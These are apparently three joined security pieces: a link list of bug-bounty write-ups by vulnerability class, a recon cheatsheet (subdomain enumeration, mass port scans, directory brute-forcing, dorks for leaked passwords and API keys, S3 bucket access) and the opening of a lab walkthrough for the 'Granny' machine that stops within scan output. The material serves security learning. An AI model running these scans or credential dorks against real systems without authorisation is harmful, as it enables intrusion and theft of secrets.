to the webhook when a team changes its visibility](https://hethical.io/trello-bug-bounty-payments-informations-are-sent-to-the-webhook-when-a-team-changes-its-visibility/) by Florian Courtial - [Change any user's password in Uber](https://hackerone.com/reports/143717) by mongo - [Vulnerability in Youtube allowed moving comments from any video to another](https://www.secgeek.net/youtube-vulnerability/) by secgeek - It's *Google* Vulnerability, so it's worth reading, as generally it is more difficult to find Google vulnerability - [Twitter Vulnerability Could Credit Cards from Any Twitter Account](https://www.secgeek.net/twitter-vulnerability/) by secgeek - [One Vulnerability allowed deleting comments of any user in all Yahoo sites](https://www.secgeek.net/yahoo-comments-vulnerability/) by secgeek - [Microsoft-careers.com Remote Password Reset](http://yasserali.com/microsoft-careers-com-remote-password-reset/) by Yaaser Ali - [How I could change your eBay password](http://yasserali.com/how-i-could-change-your-ebay-password/) by Yaaser Ali - [Duo Security Researchers Uncover Bypass of PayPal’s Two-Factor Authentication](https://duo.com/blog/duo-security-researchers-uncover-bypass-of-paypal-s-two-factor-authentication) by Duo Labs - [Hacking Facebook.com/thanks Posting on behalf of your friends! ](http://www.anandpraka.sh/2014/11/hacking-facebookcomthanks-posting-on.html) by Anand Prakash - [How I got access to millions of [redacted] accounts](https://bitquark.co.uk/blog/2016/02/09/how_i_got_access_to_millions_of_redacted_accounts) - [All Vimeo Private videos disclosure via Authorization Bypass with Excellent Technical Description](https://hackerone.com/reports/137502) by Enguerran Gillier (opnsec) - [Urgent: attacker can access every data source on Bime](https://hackerone.com/reports/149907) by Jobert Abma (jobert) - [Downloading password protected / restricted videos on Vimeo](https://hackerone.com/reports/145467) by Gazza (gazza) - [Get organization info base on uuid in Uber](https://hackerone.com/reports/151465) by Severus (severus) - [How I Exposed your Primary Facebook Email Address (Bug worth $4500)](http://roy-castillo.blogspot.hk/2013/07/how-i-exposed-your-primary-facebook.html) by Roy Castillo - [DOB disclosed using “Facebook Graph API Reverse Engineering”](https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71#.9gbtbv42q) by Raja Sekar Durairaj - [Change the description of a video without publish_actions permission in Facebook](http://philippeharewood.com/change-the-description-of-a-video-without-publish_actions-permission/) by phwd - [Response To Request Injection (RTRI)](https://www.bugbountyhq.com/front/latestnews/dWRWR0thQ2ZWOFN5cTE1cXQrSFZmUT09/) by ?, be honest, thanks to this article, I have found quite a few bugs because of using his method, respect to the author! - [Leak of all project names and all user names , even across applications on Harvest](https://hackerone.com/reports/152696) by Edgar Boda-Majer (eboda) - [Changing paymentProfileUuid when booking a trip allows free rides at Uber](https://hackerone.com/reports/162809) by Matthew Temmy (temmyscript) - [View private tweet](https://hackerone.com/reports/174721) - [Uber Enum UUID](http://www.rohk.xyz/uber-uuid/) - [Hacking Facebook’s Legacy API, Part 1: Making Calls on Behalf of Any User](http://stephensclafani.com/2014/07/08/hacking-facebooks-legacy-api-part-1-making-calls-on-behalf-of-any-user/) by Stephen Sclafani - [Hacking Facebook’s Legacy API, Part 2: Stealing User Sessions](http://stephensclafani.com/2014/07/29/hacking-facebooks-legacy-api-part-2-stealing-user-sessions/) by Stephen Sclafani - [Delete FB Video](https://danmelamed.blogspot.hk/2017/01/facebook-vulnerability-delete-any-video.html) - [Delete FB Video](https://pranavhivarekar.in/2016/06/23/facebooks-bug-delete-any-video-from-facebook/) - [Facebook Page Takeover by Manipulating the Parameter](http://arunsureshkumar.me/index.php/2016/09/16/facebook-page-takeover-zero-day-vulnerability/) by arunsureshkumar - [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) - [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec - [Classic IDOR endpoints in Twitter](http://www.anandpraka.sh/2017/05/how-i-took-control-of-your-twitter.html) - [Mass Assignment, Response to Request Injection, Admin Escalation](https://seanmelia.wordpress.com/2017/06/01/privilege-escalation-in-a-django-application/) by sean - [Getting any Facebook user's friend list and partial payment card details](https://www.josipfranjkovic.com/blog/facebook-friendlist-paymentcard-leak) - [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) ### XXE - [How we got read access on Google’s production servers](https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/) by detectify - [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht - [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf) - [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) - [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) ### Unrestricted File Upload - [File Upload XSS in image uploading of App in mopub](https://hackerone.com/reports/97672) by vijay kumar - [RCE deal to tricky file upload](https://www.secgeek.net/bookfresh-vulnerability/) by secgeek - [File Upload XSS in image uploading of App in mopub in Twitter](https://hackerone.com/reports/97672) by vijay kumar (vijay_kumar1110) ### Server Side Request Forgery (SSRF) - [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus - [SSRF to pivot internal network](https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf) - [SSRF to LFI](https://seanmelia.wordpress.com/2015/12/23/various-server-side-request-forgery-issues/) - [SSRF to query google internal server](https://www.rcesecurity.com/2017/03/ok-google-give-me-all-your-internal-dns-information/) - [SSRF by using third party Open redirect](https://buer.haus/2017/03/09/airbnb-chaining-third-party-open-redirect-into-server-side-request-forgery-ssrf-via-liveperson-chat/) by Brett BUERHAUS - [SSRF tips from BugBountyHQ of Images](https://twitter.com/BugBountyHQ/status/868242771617792000) - [SSRF to RCE](http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html) - [XXE at Twitter](https://hackerone.com/reports/248668) - [Blog post: Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface ](http://blog.portswigger.net/2017/07/cracking-lens-targeting-https-hidden.html) - [Plotly AWS Metadata SSRF (and a stored XSS)](https://ysx.me.uk/a-pair-of-plotly-bugs-stored-xss-and-aws-metadata-ssrf/) ### Race Condition - [Race conditions on Facebook, DigitalOcean and others (fixed)](http://josipfranjkovic.blogspot.hk/2015/04/race-conditions-on-facebook.html) by Josip Franjković - [Race Conditions in Popular reports feature in HackerOne](https://hackerone.com/reports/146845) by Fábio Pires (shmoo) - [Hacking Starbuck for unlimited money](https://sakurity.com/blog/2015/05/21/starbucks.html) by Egor Homakov ### Business Logic Flaw - [How I Could Steal Money from Instagram, Google and Microsoft](https://www.arneswinnen.net/2016/07/how-i-could-steal-money-from-instagram-google-and-microsoft/) by Arne Swinnen - [How I could have removed all your Facebook notes](http://www.anandpraka.sh/2015/12/summary-this-blog-post-is-about.html) - [Facebook - bypass ads account's roles vulnerability 2015](http://blog.darabi.me/2015/03/facebook-bypass-ads-account-roles.html) by POUYA DARABI - [Uber Ride for Free](http://www.anandpraka.sh/2017/03/how-anyone-could-have-used-uber-to-ride.html) by anand praka - [Uber Eat for Free](https://t.co/MCOM7j2dWX) by ### Authentication Bypass - [OneLogin authentication bypass on WordPress sites via XMLRPC in Uber](https://hackerone.com/reports/138869) by Jouko Pynnönen (jouko) - [2FA PayPal Bypass](https://henryhoggard.co.uk/blog/Paypal-2FA-Bypass) by henryhoggard - [SAML Bug in Github worth 15000](http://www.economyofmechanism.com/github-saml.html) - [Authentication bypass on Airbnb via OAuth tokens theft](https://www.arneswinnen.net/2017/06/authentication-bypass-on-airbnb-via-oauth-tokens-theft/) - [Uber Login CSRF + Open Redirect -> Account Takeover at Uber](http://ngailong.com/uber-login-csrf-open-redirect-account-takeover/) - [Administrative Panel Access](http://c0rni3sm.blogspot.hk/2017/08/accidentally-typo-to-bypass.html?m=1) by c0rni3sm - [Uber Bug Bounty: Gaining Access To An Internal Chat System](http://blog.mish.re/index.php/2017/09/06/uber-bug-bounty-gaining-access-to-an-internal-chat-system/) by mishre - [Flickr Oauth Misconfiguration](https://mishresec.wordpress.com/2017/10/12/yahoo-bug-bounty-exploiting-oauth-misconfiguration-to-takeover-flickr-accounts/) by mishre - [Slack SAML authentication bypass](http://blog.intothesymmetry.com/2017/10/slack-saml-authentication-bypass.html) by Antonio Sanso - [Shopify admin authentication bypass using partners.shopify.com](https://hackerone.com/reports/270981) by uzsunny ### HTTP Header Injection - [Twitter Overflow Trilogy in Twitter](https://blog.innerht.ml/overflow-trilogy/) by filedescriptor - [Twitter CRLF](https://blog.innerht.ml/twitter-crlf-injection/) by filedescriptor - [Adblock Plus and (a little) more in Google](https://adblockplus.org/blog/finding-security-issues-in-a-website-or-how-to-get-paid-by-google) - [$10k host header](https://sites.google.com/site/testsitehacking/10k-host-header) by Ezequiel Pereira ### Subdomain Takeover - [Hijacking tons of Instapage expired users Domains & Subdomains](http://www.geekboy.ninja/blog/hijacking-tons-of-instapage-expired-users-domains-subdomains/) by geekboy - [Reading Emails in Uber Subdomains](https://hackerone.com/reports/156536) - [Slack Bug Journey](http://secalert.net/slack-security-bug-bounty.html) - by David Vieira-Kurz - [Subdomain takeover and chain it to perform authentication bypass](https://www.arneswinnen.net/2017/06/authentication-bypass-on-ubers-sso-via-subdomain-takeover/) by Arne Swinnen - [Hacker.One Subdomain Takeover](https://hackerone.com/reports/159156) - by geekboy ### Author Write Up - [Payment Flaw in Yahoo](http://ngailong.com/abusing-multistage-logic-flaw-to-buy-anything-for-free-at-hk-deals-yahoo-com/) - [Bypassing Google Email Domain Check to Deliver Spam Email on Google’s Behalf](http://ngailong.com/bypassing-google-email-domain-check-to-deliver-spam-email-on-googles-behalf/) - [When Server Side Request Forgery combine with Cross Site Scripting](http://ngailong.com/what-could-happen-when-server-side-request-forgery-combine-with-cross-site-scripting/) ## XSSI - [Plain Text Reading by XSSI](http://balpha.de/2013/02/plain-text-considered-harmful-a-cross-domain-exploit/) - [JSON hijacking](http://blog.portswigger.net/2016/11/json-hijacking-for-modern-web.html) - [OWASP XSSI](https://www.owasp.org/images/f/f3/Your_Script_in_My_Page_What_Could_Possibly_Go_Wrong_-_Sebastian_Lekies%2BBen_Stock.pdf) - [Japan Identifier based XSSI attacks](http://www.mbsd.jp/Whitepaper/xssi.pdf) - [JSON Hijack Slide](https://www.owasp.org/images/6/6a/OWASPLondon20161124_JSON_Hijacking_Gareth_Heyes.pdf) ## Email Related - [This domain is my domain - G Suite A record vulnerability](http://blog.pentestnepal.tech/post/156959105292/this-domain-is-my-domain-g-suite-a-record) - [I got emails - G Suite Vulnerability](http://blog.pentestnepal.tech/post/156707088037/i-got-emails-g-suite-vulnerability) - [How I snooped into your private Slack messages [Slack Bug bounty worth $2,500]](http://blog.pentestnepal.tech/post/150381068912/how-i-snooped-into-your-private-slack-messages) - [Reading Uber’s Internal Emails [Uber Bug Bounty report worth $10,000]](http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty) - [Slack Yammer Takeover by using TicketTrick](https://medium.com/@intideceukelaire/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c) by Inti De Ceukelaire - [How I could have mass uploaded from every Flickr account!](https://ret2got.wordpress.com/2017/10/05/how-i-could-have-mass-uploaded-from-every-flickr-account/) ## Money Stealing - [Round error issue -> produce money for free in Bitcoin Site](https://hackerone.com/reports/176461) by 4lemon ## 2017 Local File Inclusion - [Disclosure Local File Inclusion by Symlink](https://hackerone.com/reports/213558) - [Facebook Symlink Local File Inclusion](http://josipfranjkovic.blogspot.hk/2014/12/reading-local-files-from-facebooks.html) - [Gitlab Symlink Local File Inclusion](https://hackerone.com/reports/158330) - [Gitlab Symlink Local File Inclusion Part II](https://hackerone.com/reports/178152) - [Multiple Company LFI](http://panchocosil.blogspot.sg/2017/05/one-cloud-based-local-file-inclusion.html) - [LFI by video conversion, excited about this trick!](https://hackerone.com/reports/226756) ## Miscellaneous - [SAML Pen Test Good Paper](http://research.aurainfosec.io/bypassing-saml20-SSO/) - [A list of FB writeup collected by phwd](https://www.facebook.com/notes/phwd/facebook-bug-bounties/707217202701640) by phwd - [NoSQL Injection](http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) by websecurify - [CORS in action](http://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) - [CORS in Fb messenger](http://www.cynet.com/blog-facebook-originull/) - [Web App Methodologies](https://blog.zsec.uk/ltr101-method-to-madness/) - [XXE Cheatsheet](https://www.silentrobots.com/blog/2015/12/14/xe-cheatsheet-update/) - [The road to hell is paved with SAML Assertions, Microsoft Vulnerability](http://www.economyofmechanism.com/office365-authbypass.html#office365-authbypass) - [Study this if you like to learn Mongo SQL Injection](https://cirw.in/blog/hash-injection) by cirw - [Mongo DB Injection again](http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) by websecrify - [w3af speech about modern vulnerability](https://www.youtube.com/watch?v=GNU0_Uzyvl0) by w3af - [Web cache attack that lead to account takeover](http://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html) - [A talk to teach you how to use SAML Raider](https://www.usenix.org/conference/usenixsecurity12/technical-sessions/presentation/somorovsky) - [XSS Checklist when you have no idea how to exploit the bug](http://d3adend.org/xss/ghettoBypass) - [CTF write up, Great for Bug Bounty](https://ctftime.org/writeups?tags=web200&hidden-tags=web%2cweb100%2cweb200) - [It turns out every site uses jquery mobile with Open Redirect is vulnerable to XSS](http://sirdarckcat.blogspot.com/2017/02/unpatched-0day-jquery-mobile-xss.html) by sirdarckcat - [Bypass CSP by using google-analytics](https://hackerone.com/reports/199779) - [Payment Issue with Paypal](https://hackerone.com/reports/219215) - [Browser Exploitation in Chinese](http://paper.seebug.org/) - [XSS bypass filter](https://t.co/0Kpzo52ycb) - [Markup Impropose Sanitization](https://github.com/ChALkeR/notes/blob/master/Improper-markup-sanitization.md) - [Breaking XSS mitigations via Script Gadget](https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf) - [X41 Browser Security White Paper](https://browser-security.x41-dsec.de/X41-Browser-Security-White-Paper.pdf) - [Bug Bounty Cheatsheets](https://github.com/EdOverflow/bugbounty-cheatsheet) By EdOverflow - [Messing with the Google Buganizer System for $15,600 in Bounties](https://medium.freecodecamp.org/messing-with-the-google-buganizer-system-for-15-600-in-bounties-58f86cc9f9a5) - [Electron Security White Paper](https://www.blackhat.com/docs/us-17/thursday/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf) - [Twitter's Vine Source code dump - $10080](https://avicoder.me/2016/07/22/Twitter-Vine-Source-code-dump/) - [SAML Bible](https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/) - [Bypassing Google’s authentication to access their Internal Admin panels — Vishnu Prasad P G](https://medium.com/bugbountywriteup/bypassing-googles-fix-to-access-their-internal-admin-panels-12acd3d821e3) - [Smart Contract Vulnerabilities](http://www.dasp.co/)
# Recon cheatsheet for pentesting and bugbounty ## 1) Subdomain enumeration: ### 1.1 )Sublist3r ``` python sublist3r.py -d yahoo.com ``` ### 1.3) subbrute: ``` python subbrute.py google.com ``` ### 1.4) subfinder: ``` ./subfinder -d target.com ./subfinder -d target.com -b -w all.txt ``` ### 1.5) Amass: ``` amass -d target.com ``` ### 1.6) Shodan : #### 1.6.1) Reference materials : https://leanpub.com/shodan #### 1.6.2) Shodan dorks: ``` net:64.233.160.0/19 org:"Google" ``` ### 1.7) Censys dorks: ``` ip:64:233.160.0/19 autonomous_system.asn:15169 autonomous_system.organization:"Google Inc." ``` ### 1.8) Amazon web services : ``` site:s3.amazonaws.com + abc.com ``` ### 1.9) Aquatone : ``` ~/aquatone/tesla.com ❯ grep -c -E ',(CNAME|A|AAAA),' *.csv ~/aquatone/tesla.com ❯ wc -l hosts.txt 217 hosts.txt subdomaintakeovers : ~/aquatone/tesla.com aquatone-takeover --list-detectors | grep -Fc Service. ``` ### 1.10) assetfinder: ``` assetfinder -subs-only ppf.sony.net | httprobe ``` ### 1.11) Whois and massdns: #### 1.11.1) Whois : whois search for an emal, Now reverse whois search for websites registered in the email. ``` whois -h whois.cymru.com 69.50.232.53 whois domain.com massdns -r lists/resolvers.txt -t -A -q -O -S domains.txt ``` #### 1.11.2) Massdns : ``` ./subbrute.py /root/work/bin/all.txt $TARGET.com | ./bin/massdns -r resolvers.txt -t A -a -o -w massdns_output.txt ./scripts/ct.py example.com | ./bin/massdns -r lists/resolvers.txt -t A -o S -w results.txt All.txt = https://gist.githubusercontent.com/jhaddix/86a06c5dc309d08580a018c66354a056/raw/f58e82c9abfa46a932eb92edbe6b18214141439b/all.txt ``` ### 1.13) domlink: https://github.com/vysec/DomLink ### 1.14) masscan : ``` masscan -p1-65535 -iL $TARGET_LIST --max-rate 100000 -oG $TARGET_OUTPUT ``` ### 1.15) IP Address: ``` dig a eff.org +short >69.50.232.53 ``` ### 1.16) Knockpy: ``` Knockpy <url> ``` ### 1.17) Subresolve: ``` ruby resolve.rb domainlist ruby subdomain.rb gist ((https://gist.github.com/ehsahil/0b618104319a97b21bea88fbb5ea49c2)) ruby recon.rb gist ((https://gist.github.com/ehsahil/f0f6e731a22a111399aa8503e34b6919)) ``` ### 1.18) Lazyrecon: ``` lazyrecon <url> ``` ### 1.19) Lazyshot: ``` python lazyshot.py wordlist ``` ### 1.20) IP range crawl: ``` bgp.he.net/dns/ ``` ### 1.21) Altdns: ``` ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s output.txt ``` ### 1.22) Domains from csp : https://github.com/yamakira/domains-from-csp ### 1.23) Analyse your HTTP response headers : https://securityheaders.com/ ### 1.24) More targets with burpsuite by Jason Haddix : https://medium.com/u/1dfc5adea2d4?source=post_page-----82b7e5f62e21-------------------------------- ### 1.25) Domain Analyzer : https://github.com/eldraco/domain_analyzer ### 1.26) Domain profiler : https://github.com/jpf/domain-profiler ### 1.27) VHost Scan : https://github.com/codingo/VHostScan ### 1.28) Threat crowd : https://www.threatcrowd.org/ ### 1.29) Visual site mapper : http://www.visualsitemapper.com/ ### 1.30) Google transparency report : https://transparencyreport.google.com/https/certificates ### 1.31) Certspotter: https://certspotter.com/api/v0/certs?domain=domain.com ### 1.32) Certdb: https://certdb.com/ ### 1.33) crtsh: https://crt.sh/?q=%25domain.com ### 1.34) Facebook certificate transparency monitoring systems : https://developers.facebook.com/tools/ct ### 1.35) Bucket finder - Digininja : https://digi.ninja/projects/bucket_finder.php ### 1.36) Lazys3 : https://github.com/nahamsec/lazys3 ### 1.37) Virustotal: ``` python virustotal_subdomain_enum.py <host> 20 ``` ------------------------------------------------------------------------------------------------------------------------ ## 2) Directory and file recon : ### 2.1) Dirsearch: ``` dirsearch.py -u target.com -e html,json,php -x 403,500 -t 50 ``` ### 2.2) Linkfinder for JS : https://github.com/GerbenJavado/LinkFinder ### 2.3) jsparser : https://github.com/nahamsec/JSParser ### 2.4) JS tricks : https://medium.com/bugbountywriteup/bug-bounty-tips-tricks-js-javascript-files-bdde412ea49d ### 2.5) waybackurl : https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050 ### 2.6) Gobuster: ``` gobuster -m dns -u $TARGET.com -t 100 -w all.txt ``` ------------------------------------------------------------------------------------------------------------------------ ## 3) Endpoint recon : ### 3.1) waffinder: ``` wafwoof (url) ``` To bypass waf, we need original IP: ``` https://censys.io/ https://dnsdumpster.com/ https://securitytrails.com/dns-trails http://viewdns.info/iphistory/?domain=tesla.com ``` Once you got several ips, you can test with simple curl command : ``` curl --silent --fail -H "Host: www.test.com" http://$IP_YOU_HAVE_FOUND ``` ### 3.2) Spaces finder: ``` https://github.com/appsecco/spaces-finder python3 spaces_finder.py -l sample_spaces.txt -g interesting_keywords.txt -D -m 500000 -t 2 ``` ### 3.3) Blog for api keys : ``` https://danielmiessler.com/blog/apis-2fas-achilles-heel/ ``` ### 3.4) API recon using kiterunner : ``` kr scan url -w /home/kali/folder/routes-large.kite -o json (or -o text) kr brute url -A=apiroutes-210228 ``` #### 3.4.1) For many urls : ``` kr scan source.txt -w /home/kali/folder/routes-large.kite ``` #### 3.4.2) Combining : ``` kr scan url -w /home/kali/folder/routes-large.kite -A=apiroutes-210228 ``` #### 3.4.3) Replay a request: ``` kr kb replay -w /home/kali/folder/routes-large.kite "GET 404 [6282,282,282] url 0029ab68cd009ffee" ``` #### 3.4.4) Sending to burp : --proxy=http://127.0.0.1:8080 #### 3.4.5) Filter out status code requests: ``` kr scan url -w /home/kali/folder/routes-large.kite -A=apiroutes-210228 --fail-status-codes 400,401,404,403,501,502,426,411 ``` ### 3.5) meg: ``` meg <endpoint> <host> meg / https://edoverflow.com sed 's#^#http://#g' list-of-hosts > output meg / https://edoverflow.com out-edoverflow/ ``` ### 3.6) Discover interesting files on web : ``` meg -s 200 \ lists/php targets-all \ out-php/ 2> /dev/null ``` ### 3.7) Nmap - Sensitive ports opened ``` nmap -sV -sC -sS -Pn -p 1-65535 -vvv -O -A <host> ``` ### 3.8) Nikto - Banner and version disclosure ``` Nikto -h <url> ``` ### 3.9) Certificate checks : P.S : Check Shodan of the site first to confirm the certificate transparency #### 3.10) Openssl : ``` openssl s_client -connect example.com:443 ``` #### 3.11) sslscan : ``` sslscan (url) ``` #### 3.12) Advanced REST client: Run from GUI to receive the additional headers and certificate transparency associated with the endpoint. ------------------------------------------------------------------------------------------------------------------------ ## 4) Recon using Static code analysis : ### 4.1) Brakeman for Ruby : https://brakemanscanner.org/ ### 4.2) Bandit for python: https://github.com/openstack/bandit ------------------------------------------------------------------------------------------------------------------------ ## 5) Android apps recon : Get the file from https://apkpure.com/ or /data/app/[PACKAGE NAME]/base.apk Check if packet capture shows any weird data If you see empty data to port 443, then SSL pinning is possible. If the app is not making any connection to server or burp isnt catching any response, either its ssl pinning or non-http traffic. ### 5.1) SSL Trustkiller : https://github.com/iSECPartners/Android-SSL-TrustKiller ### 5.2) SSL unpinning : https://github.com/ac-pm/SSLUnpinning_Xposed ### 5.3) Bypassing ssl pinning : https://blog.it-securityguard.com/the-stony-path-of-android-%F0%9F%A4%96-bug-bounty-bypassing-certificate-pinning/ Decompile app using apktool and dex2jar Use smali code for tool analysis and java code to read the stuff found in smali code. ``` \.json or http(s)?;// grep -hnrE "\.json" /Users/kali/smali/ ``` Use linkfinder to find all urls in the smali code. ### 5.4) oneliner bash to decompile and linkfinder : ``` apktool d app.apk; cd app;mkdir collection; find . -name \*.smali -exec sh -c 'cp "$1" collection/$(head /dev/urandom | md5 | cut -d" " -f1).smali' _ {} \;; linkfinder.py -i 'collection/*.smali' -o cli ``` ### 5.5) To narrow this down, use regex option(-r) : ``` linkfinder.py -i 'collection/*.smali' -o cli -r '\.json' ``` Check the /assets and /res/raw ### 5.6) Check for recon tricks : https://www.youtube.com/watch?v=OLgmPxTHLuY Look in smali and dex code for invoke-static and iget-object for leaking phone numbers and sms. verify_phone.json ------------------------------------------------------------------------------------------------------------------------ ## 6) AWS recon : ### 6.1) Conduct reconnaissance using opendata7 and aws : ``` aws s3 ls s3://rapid7-opendata/ --no-sign-request ``` https://www.rapid7.com/blog/post/2018/10/16/how-to-conduct-dns-reconnaissance-for-02-using-rapid7-open-data-and-aws/ ### 6.2) Bucketfinder : ``` https://digi.ninja/projects/bucket_finder.php ./bucket_finder.rb url ``` ### 6.3) Awscli : ``` aws s3 ls s3://hackerone-attachment aws s3 mv test.txt s3://hackerone-attachments ``` ### 6.4) Slurp for aws : https://github.com/bbb31/slurp ### 6.5) s3 bucket finder : https://github.com/gwen001/s3-buckets-finder ------------------------------------------------------------------------------------------------------------------------ ## 7) Google dorking : ### 7.1) Google dorks for sensitive files and urls ``` site:google.com site:google.com -www -cloud inurl intitle intext - site:target.com filetype:php - site:target.com filetype:aspx - site:target.com filetype:swf (Shockwave Flash) - site:target.com filetype:wsdl - site: target.com inurl:.php?id= - site: target.com inurl:.php?user= - site: target.com inurl:.php?book= - site: target.com inurl:login.php - site: target.com intext: “login” - site: target.com inurl:portal.php - site: target.com inurl:register.php - site: target.com intext: “index of /” - site: target.com filetype:txt - site: target.com inurl:.php.txt - site: target.com ext:txt ``` Check for ftp and smtp credentials. ### 7.2) Google dorks for s3 buckets: ``` site:s3.amazonaws.com file:pdf site:s3.amazonaws.com password ``` ------------------------------------------------------------------------------------------------------------------------ ## 8) Github dorking : ### 8.1) Find secrets in code : - API and key. (Get some more endpoints and find API keys.) - token - secret - vulnerable - http:// ### 8.2) Find juicy information in source code : https://github.com/dxa4481/truffleHog : ``` truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git ``` https://github.com/anshumanbh/git-all-secrets ### 8.3) Collection of github dorks : https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt ### 8.4) Tool to run github dorks against a repo : https://github.com/techgaun/github-dorks ### 8.5) Check for special key words : ``` API_key and AWS_Secret "password" "dev" api endpoints ``` https://edoverflow.com//2017/github-for-bugbountyhunters https://github.com/techgaun/github-dorks ### 8.6) Code repos for recon in github: ``` ".delloite.com"+"password" "delete the private ssh" "SQL injection vuln in data.views" "Multiple XSS vulnerabilities" ``` ### 8.7) Mass cloning on github : ``` https://github.com/mazen160/GithubCloner ``` ------------------------------------------------------------------------------------------------------------------------ ## 9) Nuclei project for all rounder : ``` nuclei -l test.txt -t ../nuclei-templates/ -o output.txt ``` Note : Buy a VPS and run Nuclei. ------------------------------------------------------------------------------------------------------------------------ ## 10) Webscreenshot for easy check on the URLS : From the previous methods, collect all urls, directories and files into a spreadsheet separately and delete duplicates. Export the spreadsheets into text files and use it for webscreenshot to display tons of websites easily in a single index page. ``` python webscreenshot.py -i ~/recondata/yahoo.com/alive.txt -o home/yahoo.com/screenshots -w 20 -m -a "X-FORWARDED-FOR: 127.0.0.1" ```
### IP `10.10.10.15` # Recon ### nmap `nmap -sC -sV 10.10.10.15 -o Grannynmap` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-19 11:27 EST Nmap scan report for 10.10.10.15 Host is up (0.11s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT | http-ntlm-info: | Target_Name: GRANNY | NetBIOS_Domain_Name: GRANNY | NetBIOS_Computer_Name: GRANNY | DNS_Domain_Name: granny | DNS_Computer_Name: granny |_ Product_Version: 5.2.3790 |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | WebDAV type: Unknown | Server Date: Thu, 19 Nov 2020 16:31:18 GMT | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK | Server Type: Microsoft-IIS/6.0 |_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.73 seconds ``` * Looks like theres a webserver on port 80 * We can see that WebDAV is running ### Gobuster `gobuster dir -u http://10.10.10.15/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o gobusterScan.txt` ``` =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.15/ [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/11/19 11:32:36 Starting gobuster =============================================================== /_private (Status: 301) /_vti_bin/shtml.dll (Status: 200) /_vti_bin (Status: 301) /_vti_log (Status: 301) /_vti_bin/_vti_aut/author.dll (Status: 200) /_vti_bin/_vti_adm/admin.dll (Status: 200) /aspnet_client (Status: 301) /images (Status: 301) /Images (Status: 301) =============================================================== 2020/11/19 11:32:49 Finished =============================================================== ``` * looks like any capialization of a directory works, which confirms that this is a windows machine * `/_vti_bin` looks interesting * a quick google search reveals that the machine is probably running a [microsoft sharepoint server](https://social.technet.microsoft.com/Forums/sharepoint/en-US/9d496bd1-170f-4b87-b4b3-5f9ec760921f/sharepoint-service-30-vtibin-folder?forum=sharepointadminlegacy) * there's also some indication online that the [directory should not be accessible](https://hackmag.com/security/sharepoint-serving-the-hacker/), which means we have a vulnerability we can exploit ### nikto `nikto -h 10.10.10.15` ``` - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.15 + Target Hostname: 10.10.10.15 + Target Port: 80 + Start Time: 2020-11-19 11:30:52 (GMT-5) --------------------------------------------------------------------------- + Server: Microsoft-IIS/6.0 + Retrieved microsoftofficewebserver header: 5.0_Pub + Retrieved x-powered-by header: ASP.NET + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Retrieved x-aspnet-version header: 1.1.4322 + No CGI Directories found (use '-C all' to force check all possible dirs) + OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server. + 